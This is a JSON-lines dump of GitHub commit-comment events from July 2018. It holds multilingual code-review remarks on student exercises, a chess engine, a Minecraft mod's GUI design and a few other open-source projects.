{"id":"8035529075","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29879744,"position":13,"line":13,"path":"Solutions6/HashMap.cs","commit_id":"10bfe601e52d887a8eb0584844e8a7f18a7980b6","created_at":"2018-07-30T05:14:08Z","updated_at":"2018-07-30T05:14:08Z","author_association":"NONE","body":"У хеш мапы эти поля приватные и без геттера\r\nРАзмер только через конструктор задаётся"}},"created_at":"2018-07-30T05:14:08Z"}
{"id":"8035529437","type":"CommitCommentEvent","actor":{"login":"Bluscream"},"repo":{"name":"exp111/pyTSon-Scripts"},"payload":{"comment":{"id":29879745,"position":95,"line":null,"path":"autoMove/__init__.py","commit_id":"57707a6e5f34afe4081ebb020f22ce8a10d6a22d","created_at":"2018-07-30T05:14:17Z","updated_at":"2018-07-30T05:14:17Z","author_association":"CONTRIBUTOR","body":"Getchannel(connect)info or so gives you the saved password"}},"created_at":"2018-07-30T05:14:17Z"}
{"id":"8035530262","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879747,"position":9,"line":9,"path":"listen2/amount_purchases.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:14:39Z","updated_at":"2018-07-30T05:14:39Z","author_association":"NONE","body":"пустой хеш принято задавать так:\r\n```ruby\r\nhash = {}\r\n```"}},"created_at":"2018-07-30T05:14:39Z"}
{"id":"8035531691","type":"CommitCommentEvent","actor":{"login":"ayamaoka"},"repo":{"name":"OpenChain-Project/Onboarding-JWG"},"payload":{"comment":{"id":29879757,"position":null,"line":null,"path":null,"commit_id":"4e65996e4d5f70068e3b26f78ace0c02ce1847a9","created_at":"2018-07-30T05:15:18Z","updated_at":"2018-07-30T05:15:18Z","author_association":"COLLABORATOR","body":"このライセンスはOpenChain Japan WGに関する内容だと思います。JWGと明記しほうがいいかと思いますがいかがでしょうか？\r\n\r\nI understand this license applied to OpenChain Japan WG. It is better to state this License is applied for report/contribution to \"Japan WG\"    "}},"created_at":"2018-07-30T05:15:18Z"}
{"id":"8035531845","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29879758,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-30T05:15:22Z","updated_at":"2018-07-30T05:15:22Z","author_association":"COLLABORATOR","body":"No problem, could have been an oversight anytime, so it's definitely best to double-check (I appreciate that you at least take a look at everything that I commit - another pair of eyeballs never hurt). And it's not like it didn't already happen in the past... :/"}},"created_at":"2018-07-30T05:15:22Z"}
{"id":"8035532528","type":"CommitCommentEvent","actor":{"login":"Sekilsgs2"},"repo":{"name":"Exynos7580/android_kernel_samsung_a3xeltexx"},"payload":{"comment":{"id":29879760,"position":null,"line":null,"path":null,"commit_id":"8d7e2801c682752754d85d4031ca2779d095d00c","created_at":"2018-07-30T05:15:40Z","updated_at":"2018-07-30T05:15:40Z","author_association":"CONTRIBUTOR","body":"All working - i'm use my kernel.\r\nBut now - i'm start new  branch - because current variant dont working with supersu, magisk..."}},"created_at":"2018-07-30T05:15:40Z"}
{"id":"8035537505","type":"CommitCommentEvent","actor":{"login":"dilshadmeo"},"repo":{"name":"dilshadmeo/gitcourse"},"payload":{"comment":{"id":29879771,"position":null,"line":null,"path":null,"commit_id":"ab6559b0a4f05cabb32d74a0b06744bcd9ff6a4f","created_at":"2018-07-30T05:17:46Z","updated_at":"2018-07-30T05:17:46Z","author_association":"OWNER","body":"dafafdfa"}},"created_at":"2018-07-30T05:17:46Z"}
{"id":"8035540396","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29879777,"position":null,"line":null,"path":null,"commit_id":"5fef3d8b37a7e9fa61fab1afe2a41739d1552cf5","created_at":"2018-07-30T05:18:59Z","updated_at":"2018-07-30T05:18:59Z","author_association":"COLLABORATOR","body":"The Xfce people have updated their window manager and now I was able to build it without libwnck-legacy. I hope that it's not needed for any other parts of Xfce that are yet to be ported, but currently I'd say, it can be removed from Raven. If we leave it in just in case it could easily be forgotten and rotting for quite some time before somebody comes across it again. What do you think?"}},"created_at":"2018-07-30T05:18:59Z"}
{"id":"8035541335","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29879778,"position":209,"line":209,"path":"Solutions6/HashMap.cs","commit_id":"10bfe601e52d887a8eb0584844e8a7f18a7980b6","created_at":"2018-07-30T05:19:22Z","updated_at":"2018-07-30T05:19:22Z","author_association":"NONE","body":"А как же методы contains(), containsKey(), containsObject()?"}},"created_at":"2018-07-30T05:19:22Z"}
{"id":"8035541930","type":"CommitCommentEvent","actor":{"login":"talapadi"},"repo":{"name":"chimple/tahiti"},"payload":{"comment":{"id":29879779,"position":57,"line":63,"path":"lib/recorder.dart","commit_id":"58482d6211254912bd70bfb322d9b9c71047ad5a","created_at":"2018-07-30T05:19:37Z","updated_at":"2018-07-30T05:19:37Z","author_association":"CONTRIBUTOR","body":"These should not have _ since they are local variables"}},"created_at":"2018-07-30T05:19:37Z"}
{"id":"8035545568","type":"CommitCommentEvent","actor":{"login":"kriston13"},"repo":{"name":"pgroot/express-swagger-generator"},"payload":{"comment":{"id":29879788,"position":36,"line":233,"path":"lib/swagger.js","commit_id":"af6743f75938922834ae6c2e49ed15848688623f","created_at":"2018-07-30T05:21:06Z","updated_at":"2018-07-30T05:21:06Z","author_association":"NONE","body":"The existence of `.trim()` is now causing my app to fail because `tag[1]` is undefined. \r\n\r\nI'm getting this error now:\r\n\r\n```\r\nTypeError: Cannot read property 'trim' of undefined\r\n    at fileFormat (/usr/src/app/node_modules/express-swagger-generator/lib/swagger.js:233:45)\r\n    at /usr/src/app/node_modules/express-swagger-generator/lib/swagger.js:341:30\r\n    at Object.<anonymous> (/usr/src/app/server/server.js:71:1)\r\n    at Module._compile (internal/modules/cjs/loader.js:689:30)\r\n    at Object.Module._extensions..js (internal/modules/cjs/loader.js:700:10)\r\n    at Module.load (internal/modules/cjs/loader.js:599:32)\r\n    at tryModuleLoad (internal/modules/cjs/loader.js:538:12)\r\n    at Function.Module._load (internal/modules/cjs/loader.js:530:3)\r\n    at Function.Module.runMain (internal/modules/cjs/loader.js:742:12)\r\n    at startup (internal/bootstrap/node.js:266:19)\r\n    at bootstrapNodeJSCore (internal/bootstrap/node.js:596:3)\r\n/usr/src/app/node_modules/express-swagger-generator/lib/swagger.js:233\r\n                        description: tag[1].trim()\r\n```\r\n\r\nI think this might need to be rolled back. "}},"created_at":"2018-07-30T05:21:06Z"}
{"id":"8035546784","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29879789,"position":9,"line":9,"path":"Solutions6/Stack.cs","commit_id":"10bfe601e52d887a8eb0584844e8a7f18a7980b6","created_at":"2018-07-30T05:21:37Z","updated_at":"2018-07-30T05:21:37Z","author_association":"NONE","body":"конструкторы добавить надо, хотя бы пару: пустой, с указанной коллекцией"}},"created_at":"2018-07-30T05:21:37Z"}
{"id":"8035571484","type":"CommitCommentEvent","actor":{"login":"tri-hoang"},"repo":{"name":"tri-hoang/GetToThe.LinkAsap"},"payload":{"comment":{"id":29879829,"position":null,"line":null,"path":null,"commit_id":"68af28f22bafb359c161d24d47f3de03e803f64e","created_at":"2018-07-30T05:31:17Z","updated_at":"2018-07-30T05:31:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FE Validation](https://trello.com/c/0sl7Lbju/1-fe-validation)"}},"created_at":"2018-07-30T05:31:17Z"}
{"id":"8035572217","type":"CommitCommentEvent","actor":{"login":"tri-hoang"},"repo":{"name":"tri-hoang/GetToThe.LinkAsap"},"payload":{"comment":{"id":29879831,"position":null,"line":null,"path":null,"commit_id":"eb63ee2879a70173220cc295fc0c18d2a2fa2048","created_at":"2018-07-30T05:31:35Z","updated_at":"2018-07-30T05:31:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FE Validation](https://trello.com/c/0sl7Lbju/1-fe-validation)"}},"created_at":"2018-07-30T05:31:35Z"}
{"id":"8035576129","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29879839,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-30T05:33:03Z","updated_at":"2018-07-30T05:33:03Z","author_association":"NONE","body":"Congrats too! finally the combination of tropism and king danger succeded"}},"created_at":"2018-07-30T05:33:03Z"}
{"id":"8035577143","type":"CommitCommentEvent","actor":{"login":"tri-hoang"},"repo":{"name":"tri-hoang/GetToThe.LinkAsap"},"payload":{"comment":{"id":29879840,"position":null,"line":null,"path":null,"commit_id":"68af28f22bafb359c161d24d47f3de03e803f64e","created_at":"2018-07-30T05:33:26Z","updated_at":"2018-07-30T05:33:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [URL validation](https://trello.com/c/Kh5DyI5p/7-url-validation)"}},"created_at":"2018-07-30T05:33:26Z"}
{"id":"8035577715","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879841,"position":null,"line":null,"path":null,"commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:33:40Z","updated_at":"2018-07-30T05:33:40Z","author_association":"MEMBER","body":"Why >.>"}},"created_at":"2018-07-30T05:33:40Z"}
{"id":"8035578849","type":"CommitCommentEvent","actor":{"login":"LeoYang90"},"repo":{"name":"swoole/swoole-src"},"payload":{"comment":{"id":29879842,"position":10,"line":11,"path":"src/memory/RingBuffer.c","commit_id":"502a7821bac78a9071b647b3c92e9039c9faf51c","created_at":"2018-07-30T05:34:08Z","updated_at":"2018-07-30T05:34:08Z","author_association":"NONE","body":"很明显这个 `RingBuffer` 并不是线程安全的，那么请问这个原子锁的作用是什么？"}},"created_at":"2018-07-30T05:34:08Z"}
{"id":"8035579615","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29879844,"position":1,"line":10,"path":"app/tests.py","commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T05:34:25Z","updated_at":"2018-07-30T05:34:25Z","author_association":"NONE","body":"c _ начинаются privet атрибуты и методы. Так нельзя использовать. "}},"created_at":"2018-07-30T05:34:25Z"}
{"id":"8035584219","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879848,"position":11,"line":9,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:36:14Z","updated_at":"2018-07-30T05:36:14Z","author_association":"MEMBER","body":"You've specialised the gui module. Don't do that."}},"created_at":"2018-07-30T05:36:14Z"}
{"id":"8035586090","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879850,"position":12,"line":12,"path":"listen2/number_day_of_year.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:36:58Z","updated_at":"2018-07-30T05:36:58Z","author_association":"NONE","body":"несколько сложно написано\r\nэто все можно записать в одну строку вот так:\r\n```ruby\r\nyear_months[0...month - 1].reduce(0, :+)\r\n```\r\nесли в квадртных скобках пишешь 3 точки вместо двух, то выбираются все элементы ДО указанного индекса\r\nиндекс - это как раз номер месяца минус 1\r\nчтобы \"редьюс\" не падал на пустом массиве передаем ему \"начальное\" значение равное нолю\r\nвсе работает )"}},"created_at":"2018-07-30T05:36:58Z"}
{"id":"8035587030","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879857,"position":11,"line":9,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:37:20Z","updated_at":"2018-07-30T05:37:20Z","author_association":"MEMBER","body":"`Value` is still an interface, but now it supports a getter and setter. No different from before."}},"created_at":"2018-07-30T05:37:20Z"}
{"id":"8035590159","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879866,"position":12,"line":12,"path":"listen2/number_day_of_year.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:38:28Z","updated_at":"2018-07-30T05:38:28Z","author_association":"NONE","body":"еще можно в 5 строке не прибавлять день, а отправлять его аргументом сюда\r\nи тогда в \"редьюс\" вместо ноля \"начальным значением\" можно как раз передать день\r\nвот так:\r\n```ruby\r\nyear_months[0...month - 1].reduce(day, :+)\r\n```"}},"created_at":"2018-07-30T05:38:28Z"}
{"id":"8035600217","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/Trade-Dangerous"},"payload":{"comment":{"id":29879876,"position":null,"line":null,"path":null,"commit_id":"cfe0ee2ea8bfff782fe9c741a22baf232217d095","created_at":"2018-07-30T05:42:19Z","updated_at":"2018-07-30T05:42:19Z","author_association":"OWNER","body":"This is the important line as regards the names of the ships: `# Make sure all the 'Mark N' ship names abbreviate 'Mark' the same.`"}},"created_at":"2018-07-30T05:42:19Z"}
{"id":"8035600851","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879882,"position":11,"line":9,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:42:34Z","updated_at":"2018-07-30T05:42:34Z","author_association":"MEMBER","body":"It has a different semantic meaning though, and you've tied it to the config module. IGuiAction is just that, and action. It's meant to be usable for responsing to any type of change event caused by a control, not just setting or getting a value."}},"created_at":"2018-07-30T05:42:34Z"}
{"id":"8035603526","type":"CommitCommentEvent","actor":{"login":"flybikeGx"},"repo":{"name":"iost-official/Go-IOS-Protocol"},"payload":{"comment":{"id":29879885,"position":null,"line":null,"path":null,"commit_id":"02ba63a48aa9ec021373a2b9ebcae3cb77db40d2","created_at":"2018-07-30T05:43:36Z","updated_at":"2018-07-30T05:43:36Z","author_association":"CONTRIBUTOR","body":"#8 "}},"created_at":"2018-07-30T05:43:36Z"}
{"id":"8035603917","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879886,"position":11,"line":9,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:43:44Z","updated_at":"2018-07-30T05:43:44Z","author_association":"MEMBER","body":"Isn't that what `IActionable` is for?"}},"created_at":"2018-07-30T05:43:44Z"}
{"id":"8035605204","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879889,"position":8,"line":8,"path":"listen2/populate_fabanchi_numbers.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:44:10Z","updated_at":"2018-07-30T05:44:10Z","author_association":"NONE","body":"рабочее решение\r\nно )\r\nвместо безусловного цикла `loop` с `break` внутри, лучше использовать цикл `while` с условием\r\n\r\n```ruby\r\nwhile some_condition\r\n  ....\r\nend\r\n```\r\nсчитается более простым для чтения и понимания вариантом, чем\r\n```ruby\r\nloop do\r\n  ....\r\n  ....\r\n  break some_condition\r\nend\r\n```"}},"created_at":"2018-07-30T05:44:10Z"}
{"id":"8035610953","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29879900,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T05:46:15Z","updated_at":"2018-07-30T05:46:15Z","author_association":"OWNER","body":"Hi, I am going to increase the priority to have a chance to finish this before my vacation (today I am leaving)"}},"created_at":"2018-07-30T05:46:15Z"}
{"id":"8035615724","type":"CommitCommentEvent","actor":{"login":"JamesFrancisco"},"repo":{"name":"JamesFrancisco/Getting_and_Cleaning_data"},"payload":{"comment":{"id":29879909,"position":null,"line":null,"path":null,"commit_id":"ebeb2a76abaa561ddfcf3fca0f432eeb0b6da2d0","created_at":"2018-07-30T05:48:04Z","updated_at":"2018-07-30T05:48:04Z","author_association":"OWNER","body":"Project files"}},"created_at":"2018-07-30T05:48:04Z"}
{"id":"8035617800","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879918,"position":4,"line":4,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:48:51Z","updated_at":"2018-07-30T05:48:51Z","author_association":"NONE","body":"можно сразу написать массив\r\nк примеру `vowels = %w[а о и е ё э ы у ю я]`\r\nили вобще использовать в коде строку\r\nтакое усложнение как-то сложно объяснимо, зачем инициализировать строку и потом ее переводить в массив?"}},"created_at":"2018-07-30T05:48:51Z"}
{"id":"8035619606","type":"CommitCommentEvent","actor":{"login":"bladeoner"},"repo":{"name":"emukidid/snes9xgx"},"payload":{"comment":{"id":29879927,"position":null,"line":null,"path":null,"commit_id":"a4177458176bfdf2881aebf3204c0a4fb5083640","created_at":"2018-07-30T05:49:31Z","updated_at":"2018-07-30T05:49:31Z","author_association":"NONE","body":"Hi, I tried to download the version from that time but the devkitPro tools have been moved from sourceforge to gihub so you can only download the latest. I think at that time was version r29 or r29-1, the latest is r32.\r\n\r\nWith version r26 (included in the attachment) I’m getting the same error, that is the version I always use to compile.\r\n\r\nI guess your right that its broken again."}},"created_at":"2018-07-30T05:49:31Z"}
{"id":"8035622468","type":"CommitCommentEvent","actor":{"login":"esl4m"},"repo":{"name":"ilearninteractive/ilearn-ginkgo"},"payload":{"comment":{"id":29879944,"position":6,"line":57,"path":"lms/templates/courseware/progress.html","commit_id":"47392eb07fd85957b1f25c71b4d67bcdb8fdde97","created_at":"2018-07-30T05:50:33Z","updated_at":"2018-07-30T05:50:33Z","author_association":"CONTRIBUTOR","body":"@chintanjoshi1 we need the profile.name : \r\nfullname = self.real_user.profile.name\r\n\r\nit's different than get_full_name()\r\nPlease check"}},"created_at":"2018-07-30T05:50:33Z"}
{"id":"8035622783","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879945,"position":11,"line":9,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:50:40Z","updated_at":"2018-07-30T05:50:40Z","author_association":"MEMBER","body":"IActionable is generally the controls that generate the events. It's used in ActionPerformed and is really a substitute for AbstractElement that I had in the original project."}},"created_at":"2018-07-30T05:50:40Z"}
{"id":"8035623217","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879948,"position":5,"line":5,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:50:50Z","updated_at":"2018-07-30T05:50:50Z","author_association":"NONE","body":"это проще записать так: `alphabet = ('а'..'я').to_a`"}},"created_at":"2018-07-30T05:50:50Z"}
{"id":"8035623771","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29879950,"position":18,"line":26,"path":"app/tests.py","commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T05:51:03Z","updated_at":"2018-07-30T05:51:03Z","author_association":"NONE","body":"прям срочно надо тебе перписать правильные название endpoints\r\n/api/users\r\n/api/orders и т.д"}},"created_at":"2018-07-30T05:51:03Z"}
{"id":"8035626303","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879955,"position":11,"line":11,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:51:52Z","updated_at":"2018-07-30T05:51:52Z","author_association":"NONE","body":"не очень понятно при чем здесь \"месяц\" и \"день\" )))"}},"created_at":"2018-07-30T05:51:52Z"}
{"id":"8035630886","type":"CommitCommentEvent","actor":{"login":"y1099454125"},"repo":{"name":"mybatis/jpetstore-6"},"payload":{"comment":{"id":29879969,"position":4,"line":3,"path":"src/main/java/org/mybatis/jpetstore/web/actions/CartActionBean.java","commit_id":"98290e0d3713fedb85eb2194d5b94e3c16cf37c5","created_at":"2018-07-30T05:53:27Z","updated_at":"2018-07-30T05:53:27Z","author_association":"NONE","body":"a s da s"}},"created_at":"2018-07-30T05:53:27Z"}
{"id":"8035634106","type":"CommitCommentEvent","actor":{"login":"y1099454125"},"repo":{"name":"mybatis/jpetstore-6"},"payload":{"comment":{"id":29879974,"position":2,"line":2,"path":"src/main/java/org/mybatis/jpetstore/web/actions/CatalogActionBean.java","commit_id":"98290e0d3713fedb85eb2194d5b94e3c16cf37c5","created_at":"2018-07-30T05:54:36Z","updated_at":"2018-07-30T05:54:36Z","author_association":"NONE","body":"111111"}},"created_at":"2018-07-30T05:54:36Z"}
{"id":"8035635533","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29879977,"position":53,"line":53,"path":"order/tests.py","commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T05:55:08Z","updated_at":"2018-07-30T05:55:08Z","author_association":"NONE","body":"force_authenticate() зачем тут?"}},"created_at":"2018-07-30T05:55:08Z"}
{"id":"8035637257","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879981,"position":8,"line":8,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:55:43Z","updated_at":"2018-07-30T05:55:43Z","author_association":"NONE","body":"эти две строчки неоправданно сложны... нет смысла писать сложный код\r\nпочти всегда можно написать простой код, который будет работать так же или лучше\r\nздесь достаточно обычной итерации с индексом по алфавиту, индекс будет доступен для каждой буквы сразу и его не придется считать каждый раз через `index(letter)`\r\nдалее просто добавляем букву в пустой хеш, если она глассная\r\n"}},"created_at":"2018-07-30T05:55:43Z"}
{"id":"8035637557","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879984,"position":8,"line":8,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:55:50Z","updated_at":"2018-07-30T05:55:50Z","author_association":"NONE","body":"чтобы проверить включен ли объект в коллекцию, лучше проще всего использовать метод [include?](https://ruby-doc.org/core-2.5.1/Array.html#method-i-include-3F)"}},"created_at":"2018-07-30T05:55:50Z"}
{"id":"8035639847","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29879988,"position":62,"line":62,"path":"order/tests.py","commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T05:56:35Z","updated_at":"2018-07-30T05:56:35Z","author_association":"NONE","body":"тут уже зареган пользователь, дальше только response получать надо. Убирай лишнее"}},"created_at":"2018-07-30T05:56:35Z"}
{"id":"8035641734","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29879993,"position":8,"line":8,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T05:57:11Z","updated_at":"2018-07-30T05:57:11Z","author_association":"NONE","body":"посмотри внимательно на `each`,  `each_with_index` и `each.with_index(n)` и попробуй воспользоваться тем, который здесь больше подходит\r\n[each_with_index](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index) или [each.with_index(n)](https://ruby-doc.org/core-2.5.1/Enumerator.html#method-i-with_index)\r\n\r\nпро использование второго из этих методов можно почитать к примеру в ответе на [вопрос про each.with_index(n) на СО](https://stackoverflow.com/questions/20258086/difference-between-each-with-index-and-each-with-index-in-ruby)"}},"created_at":"2018-07-30T05:57:11Z"}
{"id":"8035642462","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29879994,"position":null,"line":null,"path":null,"commit_id":"5208eb6f6013dbbb3e3273b2164b19c60a51e1ae","created_at":"2018-07-30T05:57:27Z","updated_at":"2018-07-30T05:57:27Z","author_association":"NONE","body":"@alexxxdev Great work brother .. i tested and It is fixed Now <3"}},"created_at":"2018-07-30T05:57:27Z"}
{"id":"8035643533","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29879998,"position":31,"line":38,"path":"src/main/java/com/minelittlepony/render/PonySkullRenderer.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T05:57:49Z","updated_at":"2018-07-30T05:57:49Z","author_association":"MEMBER","body":"Side note: There is a reason why I didn't do this in the first plaxe (would have changed it to access through the enum values)\r\n\r\nIt's cludgy and awkward to have to access the config to get a getter for a getter to get."}},"created_at":"2018-07-30T05:57:49Z"}
{"id":"8035648725","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29880015,"position":114,"line":114,"path":"order/tests.py","commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T05:59:38Z","updated_at":"2018-07-30T05:59:38Z","author_association":"NONE","body":"называть методы надо правильно. Чтоб не читая код можно было понять о чем идет речь.\r\n\r\ntest_403_create_order_by_executor()"}},"created_at":"2018-07-30T05:59:38Z"}
{"id":"8035650062","type":"CommitCommentEvent","actor":{"login":"Puneetdubey-official"},"repo":{"name":"Puneetdubey-official/puneetdubey-official.github.io"},"payload":{"comment":{"id":29880022,"position":null,"line":null,"path":null,"commit_id":"97b3eda4ce13292ef1f5599bb10bee9ae0bfcc43","created_at":"2018-07-30T06:00:06Z","updated_at":"2018-07-30T06:00:06Z","author_association":"OWNER","body":"changes"}},"created_at":"2018-07-30T06:00:06Z"}
{"id":"8035651147","type":"CommitCommentEvent","actor":{"login":"BarabasGitHub"},"repo":{"name":"BarabasGitHub/ZigZag"},"payload":{"comment":{"id":29880033,"position":111,"line":111,"path":"bipartite_buffer.zig","commit_id":"d9133a9919f3f1c709c979e6be357661c41b30b0","created_at":"2018-07-30T06:00:24Z","updated_at":"2018-07-30T06:00:24Z","author_association":"OWNER","body":"OK that's cool. I figured it these are more like helper functions for which it'd be a waste of they were actual functions.\r\n\r\nI'll fix it. "}},"created_at":"2018-07-30T06:00:24Z"}
{"id":"8035652029","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29880040,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T06:00:41Z","updated_at":"2018-07-30T06:00:41Z","author_association":"NONE","body":"@Stefano80 Hi Stefano, got it now. Thanks! "}},"created_at":"2018-07-30T06:00:41Z"}
{"id":"8035653098","type":"CommitCommentEvent","actor":{"login":"alexanto222"},"repo":{"name":"alexanto222/football_assessment1"},"payload":{"comment":{"id":29880041,"position":null,"line":null,"path":null,"commit_id":"62fd0d0eed71cd30e8353960b4dad2a016c6ecc9","created_at":"2018-07-30T06:01:01Z","updated_at":"2018-07-30T06:01:01Z","author_association":"OWNER","body":"Idea is to setup a basic devops environment for the project"}},"created_at":"2018-07-30T06:01:01Z"}
{"id":"8035655212","type":"CommitCommentEvent","actor":{"login":"woodenshoe-wi"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29880045,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-30T06:01:42Z","updated_at":"2018-07-30T06:01:42Z","author_association":"CONTRIBUTOR","body":"I made a petbuild, here are links to the pets produced:\r\n\r\nhttps://gitlab.com/woodenshoe-wi/petbuilds-out/raw/9faa80d9fd5b2e05e1b8bc48b8c3d59099c03492/puppylinux/pet_packages-common32/pmusic_PLUGIN_trayapp-0.5-i686_common32.pet\r\nhttps://gitlab.com/woodenshoe-wi/petbuilds-out/raw/9faa80d9fd5b2e05e1b8bc48b8c3d59099c03492/puppylinux/pet_packages-common64/pmusic_PLUGIN_trayapp-0.5-x86_64_common64.pet\r\n\r\nI think pets have a shortcoming in that they don't have an entry for the pet's \"home page\".  If the links to the forum threads for particular pets were included it would be easy to find the source code or latest version.  I guess it's too late to do anything about it, at least the petbuild system gives some info for the included pets."}},"created_at":"2018-07-30T06:01:42Z"}
